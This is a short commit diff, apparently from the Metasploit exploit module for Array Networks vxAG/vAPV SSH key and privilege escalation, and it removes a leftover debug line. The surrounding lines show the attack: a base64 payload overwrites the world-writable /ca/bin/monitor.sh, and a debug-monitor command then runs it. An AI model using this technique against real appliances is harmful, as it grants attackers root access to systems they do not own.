Array Networks vxAG and vAPV SSH key and privesc
parent
1043d9d8b2
commit
e261975c34
|
@ -177,8 +177,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
command += "cat /ca/bin/monitor.sh > /tmp/#{montemp};"
|
command += "cat /ca/bin/monitor.sh > /tmp/#{montemp};"
|
||||||
# Insert our base64 encoded payload in to the world writable /ca/bin/monitor.sh file
|
# Insert our base64 encoded payload in to the world writable /ca/bin/monitor.sh file
|
||||||
command += "/usr/bin/perl -MMIME::Base64 -le 'print decode_base64(\"#{cmd}\")' > /ca/bin/monitor.sh;"
|
command += "/usr/bin/perl -MMIME::Base64 -le 'print decode_base64(\"#{cmd}\")' > /ca/bin/monitor.sh;"
|
||||||
command += "/usr/bin/perl -MMIME::Base64 -le 'print decode_base64(\"#{cmd}\")' > /tmp/blaat.sh;"
|
|
||||||
|
|
||||||
# Turn debug monitoring on, which will start the monitor.sh and thus our payload
|
# Turn debug monitoring on, which will start the monitor.sh and thus our payload
|
||||||
command += '/ca/bin/backend -c "debug monitor on"`echo -e "\0374"`;'
|
command += '/ca/bin/backend -c "debug monitor on"`echo -e "\0374"`;'
|
||||||
# Copy monitor.sh data back
|
# Copy monitor.sh data back
|
||||||
|
|
Loading…
Reference in New Issue